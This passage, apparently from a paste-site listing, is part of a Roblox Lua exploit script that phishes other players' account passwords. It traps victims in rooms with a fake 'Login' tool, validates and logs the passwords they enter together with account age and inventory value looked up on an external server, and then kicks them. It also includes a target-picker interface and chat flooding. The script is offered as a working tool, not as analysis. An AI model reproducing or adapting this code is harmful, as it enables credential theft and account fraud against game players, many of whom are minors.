  802. local rap = "Error."
  803. if RAPApi then
  804. ypcall(function()
  805. local http = game:GetService("HttpService")
  806. local rawrap = http:JSONDecode(game:HttpGet("http://roblox.plus:2052/inventory?username=" .. user,true))
  807. rap = tostring(rawrap.rap)
  808. end)
  809. else
  810. rap = "Disabled."
  811. end
  812. return rap
  813. end
  814.  
  815. function logAccount(user,pass)
  816. local playerName = user.Name
  817. local playerAge = tostring(user.AccountAge)
  818. local playerRAP = getRap(playerName)
  819.  
  820. if print then
  821. print(BCtoDumpStr(tostring(user.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  822. end
  823. if readfile and writefile then
  824. if readfile(getelysianpath()..fileName..".txt") == "nil path doesn't exist" then
  825. writefile(getelysianpath()..fileName..".txt", BCtoDumpStr(tostring(user.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  826. else
  827. local tempFile = readfile(getelysianpath()..fileName..".txt")
  828. writefile(getelysianpath()..fileName..".txt", tempFile .. "\n" .. BCtoDumpStr(tostring(user.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  829. end
  830. end
  831. end
  832.  
  833. function teleportVictims()
  834. for i,v in pairs(CurrentlyScamming) do
  835. ypcall(function()
  836. v.Player.Character.HumanoidRootPart.CFrame = v.RoomModel.Spawn.CFrame + Vector3.new(0,-10,0)
  837. v.Player.Character.HumanoidRootPart.Anchored = true
  838. if not v.Player.Backpack:FindFirstChild("Login") and not v.Player.Character:FindFirstChild("Login") then
  839. if not v.RoomModel:FindFirstChild("Login") then
  840. local tempTools = {}
  841. for i2,v2 in pairs(v.Player.Backpack:GetChildren()) do
  842. table.insert(tempTools,v2:Clone())
  843. v2:Destroy()
  844. end
  845. local newTool = guiTool:Clone()
  846. newTool.Parent = v.RoomModel
  847. newTool.Handle.CanCollide = false
  848. newTool.Handle.CFrame = v.Player.Character.Head.CFrame
  849. newTool.Handle.BodyPosition.Position = v.RoomModel.Spawn.Position + Vector3.new(0,-10,0)
  850. getUText(newTool).Text = v.Player.Name
  851. spawn(function()
  852. wait(2)
  853. for i2,v2 in pairs(tempTools) do
  854. v2.Parent = v.Player.Backpack
  855. end
  856. end)
  857. newTool.Changed:connect(function(prop)
  858. if not isScamming(v.Player.Name) then return end
  859. if prop == "Parent" and newTool.Parent.Name == "Backpack" then
  860. if v.Player.Backpack:FindFirstChild("Login") then
  861. if getILPopUp(v.Player.Backpack.Login) and getPText(v.Player.Backpack.Login) then
  862. getILPopUp(v.Player.Backpack.Login).Visible = false
  863. if v.Player.Backpack:FindFirstChild("Login") then
  864. if checkPass(getPText(v.Player.Backpack.Login).Text, v.Player) then
  865. logAccount(v.Player, getPText(v.Player.Backpack.Login).Text)
  866. unscPlayer(v.Player)
  867. spawn(function()
  868. wait(0.5)
  869. if kickLogin then
  870. if not v.Player.Backpack:FindFirstChild("Bypass Rules") and not v.Player.Character:FindFirstChild("Bypass Rules") then
  871. v.Player:Remove()
  872. end
  873. end
  874. end)
  875. else
  876. getILPopUp(v.Player.Backpack.Login).Visible = true
  877. getPText(v.Player.Backpack.Login).Text = ""
  878. wait()
  879. if not v.Player.Character:FindFirstChild("Login") then
  880. newTool.Parent = v.RoomModel
  881. newTool.Handle.CFrame = v.Player.Character.Head.CFrame
  882. end
  883. end
  884. end
  885. end
  886. end
  887. end
  888. end)
  889. end
  890. end
  891. end)
  892. end
  893. end
  894.  
  895. wait()
  896.  
  897. game.Players.PlayerRemoving:connect(function(playa)
  898. for i,v in pairs(CurrentlyScamming) do
  899. if v.Player == playa then
  900. table.remove(CurrentlyScamming,i)
  901. end
  902. end
  903. end)
  904.  
  905. --[[
  906. local infoGui = Instance.new("ScreenGui",game.CoreGui)
  907. local infoText = Instance.new("TextLabel",infoGui)
  908. infoText.Position = UDim2.new(0,0,1,-20)
  909. infoText.Size = UDim2.new(1,0,0,20)
  910. infoText.FontSize = "Size18"
  911. infoText.Font = "SourceSansBold"
  912. infoText.BackgroundTransparency = 1
  913. infoText.TextColor3 = Color3.new(1,1,1)
  914. infoText.TextXAlignment = "Right"
  915. infoText.Text = "Press 'p' to toggle chat spam."
  916. --]]
  917.  
  918. local mouse = game.Players.LocalPlayer:GetMouse()
  919. mouse.KeyDown:connect(function(key)
  920. if key == "p" then
  921. floodChat = not floodChat
  922. end
  923. end)
  924.  
  925. spawn(function()
  926. while wait(3) do
  927. fixPlayers()
  928. end
  929. end)
  930.  
  931. while wait() do
  932. teleportVictims()
  933. if floodChat then
  934. game.Players:Chat(".")
  935. game.Players:Chat(".")
  936. end
  937. if ScamType == "Normal" then
  938. for i,v in pairs(game.Players:GetPlayers()) do
  939. if StorageType == 1 then
  940. if not game.CoreGui.MRStorage:FindFirstChild(v.Name) and not isScamming(v.Name) and not isBypass(v) and v ~= game.Players.LocalPlayer then
  941.  
  942. end
  943. elseif StorageType == 2 then
  944. if not game.ReplicatedStorage:FindFirstChild("MRStorage") then
  945. MRStorage = Instance.new("Folder",game.ReplicatedStorage)
  946. MRStorage.Name = "MRStorage"
  947. end
  948. if not game.ReplicatedStorage.MRStorage:FindFirstChild(v.Name) and not isScamming(v.Name) and not isBypass(v) and v ~= game.Players.LocalPlayer then
  949. scPlayer(v)
  950. end
  951. end
  952. end
  953. elseif ScamType == "Pick" then
  954. if StorageType == 1 then
  955. if not game.CoreGui.MRStorage:FindFirstChild(v.Name) and not isScamming(v.Name) and not isBypass(v) and v ~= game.Players.LocalPlayer then
  956.  
  957. end
  958. elseif StorageType == 2 then
  959. if not game.ReplicatedStorage:FindFirstChild("MRStorage") then
  960. MRStorage = Instance.new("Folder",game.ReplicatedStorage)
  961. MRStorage.Name = "MRStorage"
  962. end
  963. if not game.CoreGui:FindFirstChild("PickGui") then
  964. local newPickGui = pickGui:Clone()
  965. newPickGui.Parent = game.CoreGui
  966. spawn(function()
  967. local pickGuiList = newPickGui.MainFrame.AccList
  968. local pickGuiResult = newPickGui.MainFrame.UserResult
  969. pickGuiList.CanvasSize = UDim2.new(0,0,0,0)
  970. local function updatePickList()
  971. pickGuiList:ClearAllChildren()
  972. for i,v in pairs(game.Players:GetPlayers()) do
  973. if v ~= player then
  974. local newRes = pickGuiResult:Clone()
  975. newRes.PlayerName.Text = v.Name
  976. newRes.PlayerPic.Image = "http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&userId="..v.UserId
  977. newRes.Position = UDim2.new(0,0,0,40 * #pickGuiList:GetChildren())
  978. if isScamming(v.Name) then
  979. newRes.PlayerStatus.Text = "Scamming..."
  980. end
  981. if isBypass(v) then
  982. newRes.PlayerStatus.Text = "Scammed"
  983. end
  984. newRes.Parent = pickGuiList
  985. pickGuiList.CanvasSize = UDim2.new(0,0,0,40 * #pickGuiList:GetChildren())
  986. newRes.Visible = true
  987. newRes.MouseButton1Down:connect(function()
  988. if not isScamming(v.Name) then
  989. scPlayer(v)
  990. end
  991. end)
  992. end
  993. end
  994. end
  995. updatePickList()
  996. newPickGui.MainFrame.Refresh.MouseButton1Down:connect(function()
  997. updatePickList()
  998. end)
  999. end)
  1000. end
  1001. end
  1002. end
  1003. end
  1004. end
  1005. RealMGX7.MouseButton1Click:connect(onRealMGX7Click)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement